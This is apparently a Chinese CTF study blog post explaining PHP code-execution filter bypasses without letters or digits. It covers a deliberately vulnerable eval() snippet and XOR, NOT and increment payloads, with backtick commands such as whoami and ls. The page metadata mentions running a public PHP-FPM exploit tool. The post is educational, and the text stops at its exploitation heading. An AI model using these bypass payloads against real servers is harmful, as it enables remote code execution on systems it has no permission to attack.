<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>无数字字母rce | C6jU3のblog</title>
  <meta name="keywords" content=" rce ">
  <meta name="description" content="无数字字母rce | C6jU3のblog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="PHP#CVEweb311老漏洞，没搜到什么东西，全是工具秒了 https:&#x2F;&#x2F;github.com&#x2F;neex&#x2F;phuip-fpizdam 克隆下来（需要GO环境 使用说明&#x2F;&#x2F;目录跳转 cd phuip-fpizdam  &#x2F;&#x2F;安装所需 go get -v &amp;&amp; go build   执行： go run . url&#x2F;index.php  例如 go run . http:&#x2F;&#x2F;660">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP_CVE">
<meta property="og:url" content="https://blog.cgjue.cn/2024/03/14/PHP-CVE/index.html">
<meta property="og:site_name" content="C6jU3のblog">
<meta property="og:description" content="PHP#CVEweb311老漏洞，没搜到什么东西，全是工具秒了 https:&#x2F;&#x2F;github.com&#x2F;neex&#x2F;phuip-fpizdam 克隆下来（需要GO环境 使用说明&#x2F;&#x2F;目录跳转 cd phuip-fpizdam  &#x2F;&#x2F;安装所需 go get -v &amp;&amp; go build   执行： go run . url&#x2F;index.php  例如 go run . http:&#x2F;&#x2F;660">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog.cgjue.cn/img/image-20240314201110147.png">
<meta property="og:image" content="https://blog.cgjue.cn/themes/3-hexo/source/img/image-20240314201557152.png">
<meta property="article:published_time" content="2024-03-14T11:28:28.000Z">
<meta property="article:modified_time" content="2024-03-14T12:59:18.394Z">
<meta property="article:author" content="C6jU3">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.cgjue.cn/img/image-20240314201110147.png">


<link rel="icon" href="/img/avatar.png">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/github.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.png"/>
</a>
<div class="author">
    <span>C6jU3</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://blog.cgjue.cn"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:cgjue871@163.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=417148909&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(29)</small>
            
        </div>
    </li>
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
                
    <li>
        <div data-rel="CTF">
            <i class="fold iconfont icon-right"></i>
            CTF
            <small>(21)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY">
            <i class="fold iconfont icon-right"></i>
            STUDY
            <small>(15)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;CRYPTO">
            <i class="fold iconfont icon-right"></i>
            CRYPTO
            <small>(3)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;CRYPTO&lt;---&gt;RSA">
            
            RSA
            <small>(3)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;MISC">
            <i class="fold iconfont icon-right"></i>
            MISC
            <small>(1)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;MISC&lt;---&gt;Godzilla">
            
            Godzilla
            <small>(1)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;PWN">
            <i class="fold iconfont icon-right"></i>
            PWN
            <small>(1)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;PWN&lt;---&gt;ROP">
            
            ROP
            <small>(1)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB">
            <i class="fold iconfont icon-right"></i>
            WEB
            <small>(9)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;反序列化">
            <i class="fold iconfont icon-right"></i>
            反序列化
            <small>(3)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;反序列化&lt;---&gt;反序列化基础">
            
            反序列化基础
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;反序列化&lt;---&gt;字符串逃逸">
            
            字符串逃逸
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;反序列化&lt;---&gt;Phar">
            
            Phar
            <small>(1)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;JWT">
            
            JWT
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;PHPCVE">
            
            PHPCVE
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;RCE">
            
            RCE
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;SSRF">
            
            SSRF
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;struts2">
            
            struts2
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;Unicode">
            
            Unicode
            <small>(1)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

                
            </ul>
        
    </li>

                
                    
    <li>
        <div data-rel="CTF&lt;---&gt;WP">
            
            WP
            <small>(6)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

            
        
    
        
            
        
    
        
            
        
    
        
            
                
    <li>
        <div data-rel="JAVA">
            <i class="fold iconfont icon-right"></i>
            JAVA
            <small>(1)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="JAVA&lt;---&gt;study">
            
            study
            <small>(1)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
                
    <li>
        <div data-rel="SOME">
            <i class="fold iconfont icon-right"></i>
            SOME
            <small>(7)</small>
        </div>
        
            <ul class="sub hide">
                
                    
    <li>
        <div data-rel="SOME&lt;---&gt;hexo">
            
            hexo
            <small>(2)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="SOME&lt;---&gt;life">
            
            life
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="SOME&lt;---&gt;linux">
            
            linux
            <small>(1)</small>
        </div>
        
    </li>

                
                    
    <li>
        <div data-rel="SOME&lt;---&gt;Tools">
            
            Tools
            <small>(3)</small>
        </div>
        
    </li>

                
            </ul>
        
    </li>

            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="29">
<input type="hidden" id="yelog_site_word_count" value="53.1k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://blog.shenghuo2.top/">shenghuo2</a></li>
            
            <li><a target="_blank" href="http://blog.q1ngchuan.top/">晴川</a></li>
            
            <li><a target="_blank" href="https://yhuanhuan01.github.io/">yhuanhuan</a></li>
            
            <li><a target="_blank" href="https://shenshuoyaoyouguangha.github.io/">wuming</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>建站</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>crypto</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CTF</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Godzilla</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>java</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>rce</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ROP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>tool</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Unicode</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>unserialize</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>web</a>
            </li>
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 CTF STUDY WEB PHPCVE "
           href="/2024/03/14/PHP-CVE/"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP_CVE">PHP_CVE</span>
            <span class="post-date" title="2024-03-14 19:28:28">2024/03/14</span>
        </a>
        
        
        <a  class="全部文章 SOME Tools "
           href="/2024/03/13/Beautify-Shell/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="Beautify_Shell">Beautify_Shell</span>
            <span class="post-date" title="2024-03-13 16:36:20">2024/03/13</span>
        </a>
        
        
        <a  class="全部文章 CTF WP "
           href="/2024/03/11/HSCCTF-2024/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HSCCTF#2024">HSCCTF#2024</span>
            <span class="post-date" title="2024-03-11 18:02:20">2024/03/11</span>
        </a>
        
        
        <a  class="全部文章 SOME Tools "
           href="/2024/03/05/qqnt/"
           data-tag="tool"
           data-author="" >
            <span class="post-title" title="NT">NT</span>
            <span class="post-date" title="2024-03-05 16:12:03">2024/03/05</span>
        </a>
        
        
        <a  class="全部文章 CTF WP "
           href="/2024/03/04/qsnctf2024-Round-1/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="青少年ctf2024#Round_1">青少年ctf2024#Round_1</span>
            <span class="post-date" title="2024-03-04 18:10:24">2024/03/04</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB struts2 "
           href="/2023/11/03/java/"
           data-tag="java"
           data-author="" >
            <span class="post-title" title="struts2">struts2</span>
            <span class="post-date" title="2023-11-03 18:36:25">2023/11/03</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY PWN ROP "
           href="/2023/09/16/pwn/"
           data-tag="ROP"
           data-author="" >
            <span class="post-title" title="ROP">ROP</span>
            <span class="post-date" title="2023-09-16 14:57:02">2023/09/16</span>
        </a>
        
        
        <a  class="全部文章 CTF WP "
           href="/2023/09/10/SICTF-2nd/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="SICTF-2nd">SICTF-2nd</span>
            <span class="post-date" title="2023-09-10 15:15:29">2023/09/10</span>
        </a>
        
        
        <a  class="全部文章 CTF WP "
           href="/2023/09/04/nepctf-2023/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="nepctf-2023">nepctf-2023</span>
            <span class="post-date" title="2023-09-04 19:18:35">2023/09/04</span>
        </a>
        
        
        <a  class="全部文章 CTF WP "
           href="/2023/08/29/NSSCTF-2nd/"
           data-tag="CTF"
           data-author="" >
            <span class="post-title" title="NSSCTF-2nd">NSSCTF-2nd</span>
            <span class="post-date" title="2023-08-29 11:04:56">2023/08/29</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY MISC Godzilla "
           href="/2023/08/09/HK/"
           data-tag="Godzilla"
           data-author="" >
            <span class="post-title" title="HK的怪兽">HK的怪兽</span>
            <span class="post-date" title="2023-08-09 00:36:08">2023/08/09</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY CRYPTO RSA "
           href="/2023/08/07/Wilson/"
           data-tag="crypto"
           data-author="" >
            <span class="post-title" title="Wilson">Wilson</span>
            <span class="post-date" title="2023-08-07 01:59:13">2023/08/07</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB 反序列化 Phar "
           href="/2023/08/06/Phar/"
           data-tag="unserialize"
           data-author="" >
            <span class="post-title" title="Phar">Phar</span>
            <span class="post-date" title="2023-08-06 12:38:09">2023/08/06</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB Unicode "
           href="/2023/07/30/checkin/"
           data-tag="Unicode"
           data-author="" >
            <span class="post-title" title="checkin">checkin</span>
            <span class="post-date" title="2023-07-30 09:56:10">2023/07/30</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB JWT "
           href="/2023/07/29/jwtstruts/"
           data-tag="unserialize"
           data-author="" >
            <span class="post-title" title="Jwt&amp;struts2">Jwt&amp;struts2</span>
            <span class="post-date" title="2023-07-29 14:49:15">2023/07/29</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY CRYPTO RSA "
           href="/2023/07/23/CRT/"
           data-tag="crypto"
           data-author="" >
            <span class="post-title" title="CRT">CRT</span>
            <span class="post-date" title="2023-07-23 19:09:47">2023/07/23</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB 反序列化 字符串逃逸 "
           href="/2023/07/23/strout/"
           data-tag="unserialize"
           data-author="" >
            <span class="post-title" title="PHP反序列化字符串逃逸">PHP反序列化字符串逃逸</span>
            <span class="post-date" title="2023-07-23 17:48:49">2023/07/23</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB 反序列化 反序列化基础 "
           href="/2023/07/23/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"
           data-tag="unserialize"
           data-author="" >
            <span class="post-title" title="PHP反序列化">PHP反序列化</span>
            <span class="post-date" title="2023-07-23 17:48:49">2023/07/23</span>
        </a>
        
        
        <a  class="全部文章 SOME Tools "
           href="/2023/07/22/sagemath/"
           data-tag="crypto"
           data-author="" >
            <span class="post-title" title="Sagemath">Sagemath</span>
            <span class="post-date" title="2023-07-22 19:45:36">2023/07/22</span>
        </a>
        
        
        <a  class="全部文章 SOME linux "
           href="/2023/07/22/AddSCSI/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="AddSCSI">AddSCSI</span>
            <span class="post-date" title="2023-07-22 19:44:36">2023/07/22</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB SSRF "
           href="/2023/07/18/SSRF/"
           data-tag="ssrf"
           data-author="" >
            <span class="post-title" title="SSRF学习总结">SSRF学习总结</span>
            <span class="post-date" title="2023-07-18 09:20:58">2023/07/18</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY WEB RCE "
           href="/2023/07/18/%E6%97%A0%E6%95%B0%E5%AD%97%E5%AD%97%E6%AF%8Drce/"
           data-tag="rce"
           data-author="" >
            <span class="post-title" title="无数字字母rce">无数字字母rce</span>
            <span class="post-date" title="2023-07-18 09:20:58">2023/07/18</span>
        </a>
        
        
        <a  class="全部文章 SOME hexo "
           href="/2023/07/17/fluid/"
           data-tag="建站"
           data-author="" >
            <span class="post-title" title="Fluid">Fluid</span>
            <span class="post-date" title="2023-07-17 18:00:55">2023/07/17</span>
        </a>
        
        
        <a  class="全部文章 SOME hexo "
           href="/2023/07/17/hexo/"
           data-tag="建站"
           data-author="" >
            <span class="post-title" title="Hexo+Github">Hexo+Github</span>
            <span class="post-date" title="2023-07-17 17:24:10">2023/07/17</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY CRYPTO RSA "
           href="/2023/07/16/00-01/"
           data-tag="crypto"
           data-author="" >
            <span class="post-title" title="低加密指数广播攻击">低加密指数广播攻击</span>
            <span class="post-date" title="2023-07-16 21:16:52">2023/07/16</span>
        </a>
        
        
        <a  class="全部文章 SOME life "
           href="/2023/07/16/hello-world/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="萌新">萌新</span>
            <span class="post-date" title="2023-07-16 21:16:52">2023/07/16</span>
        </a>
        
        
        <a  class="全部文章 JAVA study "
           href="/2023/07/16/javabase/"
           data-tag="java"
           data-author="" >
            <span class="post-title" title="JavaStudy">JavaStudy</span>
            <span class="post-date" title="2023-07-16 21:16:52">2023/07/16</span>
        </a>
        
        
        <a  class="全部文章 CTF WP "
           href="/2023/06/04/CISCN-2023/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="CISCN#2023">CISCN#2023</span>
            <span class="post-date" title="2023-06-04 19:06:30">2023/06/04</span>
        </a>
        
        
        <a  class="全部文章 CTF STUDY "
           href="/2023/01/02/%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF/"
           data-tag="web"
           data-author="" >
            <span class="post-title" title="暑假学习路线">暑假学习路线</span>
            <span class="post-date" title="2023-01-02 09:20:58">2023/01/02</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-无数字字母rce" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">无数字字母rce</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="CTF">CTF</a> > 
            
            <a  data-rel="CTF&lt;---&gt;STUDY">STUDY</a> > 
            
            <a  data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB">WEB</a> > 
            
            <a  data-rel="CTF&lt;---&gt;STUDY&lt;---&gt;WEB&lt;---&gt;RCE">RCE</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color4">rce</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2024-03-07 18:51:50'>2023-07-18 09:20</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:1.8k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE"><span class="toc-text">RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP%E4%B8%AD%E7%9A%84%E5%BC%82%E6%88%96"><span class="toc-text">PHP中的异或</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP%E4%B8%AD%E7%9A%84%E5%8F%96%E5%8F%8D"><span class="toc-text">PHP中的取反</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP%E4%B8%AD%E7%9A%84%E8%87%AA%E5%A2%9E"><span class="toc-text">PHP中的自增</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP%E4%B8%AD%E7%9A%84%E7%9F%AD%E6%A0%87%E7%AD%BE"><span class="toc-text">PHP中的短标签</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BC%95%E5%8F%B7"><span class="toc-text">PHP中的反引号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP%E4%B8%AD%E7%9A%84%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6"><span class="toc-text">PHP中的临时文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-text">利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ctfshow-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-55"><span class="toc-text">ctfshow-命令执行-55</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%95%E4%B8%80%EF%BC%8C%E6%B3%95%E4%BA%8C%E5%92%8C56%E5%81%9A%E6%B3%95%E4%B8%80%E6%A0%B7"><span class="toc-text">法一，法二和56做法一样</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web-56"><span class="toc-text">web-56</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B2%A1%E6%9C%89%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="toc-text">.没有被过滤</span></a></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-6 i,
    .toc-level-6 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h1><p><strong>原理</strong></p>
<p>Linux终端可以通过<code>$&#39;\xxx&#39;</code>的方式执行命令，xxx是字符ascii码的八进制形式，通过这一点，我们可以通过位运算符号和Linux终端的其他特性，在没有数字的情况下继续构造这样的形式以实现无字母数字仅用几个字符就实现任意命令执行。</p>
<p><strong>无数字字母rce绕过，基本上是对这个的绕过</strong></p>
<pre><code class="php">&lt;?php
if(!preg_match(&#39;/[a-z0-9]/is&#39;,$_GET[&#39;shell&#39;])) &#123;
  eval($_GET[&#39;shell&#39;]);
&#125;
</code></pre>
<p><strong>先了解一些基础知识</strong></p>
<h2 id="PHP中的异或"><a href="#PHP中的异或" class="headerlink" title="PHP中的异或"></a>PHP中的异或</h2><pre><code>&lt;?php
echo &quot;5&quot;^&quot;Z&quot;;
?&gt;
</code></pre>
<p>输出为o</p>
<p>先把5和Z的ASCLL转换成二进制然后异或</p>
<p>即00110101和01011010异或得到十进制的111,为o.</p>
<p>函数执行</p>
<pre><code>&lt;?php
    function o()&#123;
        echo &quot;Hello,C6&quot;;
    &#125;
    $_++;
    $__= &quot;5&quot; ^ &quot;Z&quot;;
    $__();
?&gt;
</code></pre>
<p>结果能够输出”Hello,C6”，原理如下</p>
<blockquote>
<p>$__&#x3D; “5” ^ “Z”这步我们上面已经见过了,将会赋给__这个变量一个值”o”</p>
<p>由于PHP的动态语言特性,PHP允许我们将字符串当成函数来处理,因此在这里面的$__()就相当于调用了o()</p>
</blockquote>
<h2 id="PHP中的取反"><a href="#PHP中的取反" class="headerlink" title="PHP中的取反"></a>PHP中的取反</h2><p><strong>取反</strong>（~） 属于按位逻辑运算符，属于一元运算符，其本质其实就是将数据每一位按位取反，即将0变成1，将1变成0； 1、</p>
<pre><code class="php">&lt;?php
$a=urlencode(~&#39;phpinfo&#39;);
echo $a;
echo &#39;&lt;/br&gt;&#39;;
$b=~urldecode($a);
echo $b;
//需要注意的是，可能Payload中会含有一些特殊字符，需要对Payload进行一次URL编码
</code></pre>
<p>输出</p>
<pre><code class="php">%8F%97%8F%96%91%99%90&lt;/br&gt;phpinfo
</code></pre>
<p>payload:</p>
<pre><code class="php">(~%8F%97%8F%96%91%99%90)();
</code></pre>
<p>等价于</p>
<pre><code class="php">phpinfo();
</code></pre>
<p>对于一个汉字进行<del>($x{0})或</del>($x{1})或~($x{2})的操作，可以得到某个ASCII码的字符值</p>
<blockquote>
<p>PHP5中，是不支持($a)()这种调用方法的，但在PHP7中支持这种调用方法，因此支持这么写(‘phpinfo’)();</p>
</blockquote>
<h2 id="PHP中的自增"><a href="#PHP中的自增" class="headerlink" title="PHP中的自增"></a>PHP中的自增</h2><p>在异或的例子里我们发现</p>
<p><strong>我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字0</strong></p>
<p>$_++对_变量进行了自增操作,由于我们没有定义_的值,PHP会给_赋一个默认值NULL&#x3D;&#x3D;0</p>
<p>也就是说，如果我们能够得到”A”，那么我们就能通过自增自减，得到所有的字母。 那么问题就转化为怎么得到一个字符”A”。</p>
<p>在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为”Array”。</p>
<p>再取这个字符串的第一个字母，就可以获得”A”。</p>
<pre><code class="php">&lt;?php
$a = &#39;&#39;.[];
var_dump($a);
</code></pre>
<pre><code class="php">&lt;?php
$_=[].&#39;&#39;;   //得到&quot;Array&quot;
$___ = $_[$__];   //得到&quot;A&quot;，$__没有定义，默认为False也即0，此时$___=&quot;A&quot;
$__ = $___;   //$__=&quot;A&quot;
$_ = $___;   //$_=&quot;A&quot;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   //得到&quot;S&quot;，此时$__=&quot;S&quot;
$___ .= $__;   //$___=&quot;AS&quot;
//类似这个过程
</code></pre>
<h2 id="PHP中的短标签"><a href="#PHP中的短标签" class="headerlink" title="PHP中的短标签"></a>PHP中的短标签</h2><p>PHP中有两种短标签</p>
<pre><code class="php">&lt;??&gt;和&lt;?=?&gt;
</code></pre>
<p>其中</p>
<pre><code class="php">&lt;??&gt;相当于对&lt;?php&gt;的替换
</code></pre>
<p>而</p>
<pre><code class="php">&lt;?=?&gt;则是相当于&lt;? echo?&gt;
</code></pre>
<p>例如:</p>
<pre><code class="php">&lt;?= &#39;111&#39;?&gt;
    //等价
&lt;? echo(&#39;111&#39;);?&gt;    
    
</code></pre>
<pre><code class="php">&lt;??&gt;
</code></pre>
<p>这种写法则需要short_open_tag开启才行。</p>
<pre><code class="php">所以就相当于一个新的PHP文件，这样的话就需要将最开始前面的&lt;?php给闭合，不然不会执行。
 闭合之后就相当于
&lt;?php
?&gt;
&lt;?=`ls`;
</code></pre>
<h2 id="PHP中的反引号"><a href="#PHP中的反引号" class="headerlink" title="PHP中的反引号"></a>PHP中的反引号</h2><p>反引号可以起到命令执行的作用</p>
<pre><code class="php">&lt;?php
$_=`whoami`;
echo $_;
</code></pre>
<p>可以执行whoami</p>
<p>与短标签相利用可以写成</p>
<pre><code class="php">&lt;?= `whoami`?&gt;
</code></pre>
<h2 id="PHP中的临时文件"><a href="#PHP中的临时文件" class="headerlink" title="PHP中的临时文件"></a>PHP中的临时文件</h2><p>一般来说这个文件在linux下面保存在&#x2F;tmp&#x2F;php??????一般后面的6个字符是随机生成的有大小写。</p>
<p>&#x2F;&#x2F;具体看web56</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>基本思路就是</p>
